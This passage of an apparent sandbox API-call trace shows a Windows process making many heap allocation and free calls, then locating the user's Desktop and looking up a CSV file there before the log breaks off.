hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.095] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0134.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0134.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0134.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0134.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0134.096] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.096] FreeLibrary (hLibModule=0x756e0000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.096] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0134.096] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.096] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0134.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.097] CloseHandle (hObject=0x2a0) returned 1 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0134.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.098] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0134.099] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0134.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0134.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0134.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.100] CloseHandle (hObject=0x2d0) returned 1 [0134.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0134.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36010 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0134.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0134.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0134.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0134.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0134.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0134.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0134.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0134.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0134.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0134.420] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0134.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0134.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0134.421] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/5_pKd716n7PnD.csv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv", lpFilePart=0x8cedf4*="5_pKd716n7PnD.csv") returned 0x29 [0134.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0134.421] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5_pKd716n7PnD.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\5_pkd716n7pnd.csv")) returned 0x20 [0134.421] FindFirstFileW (in: 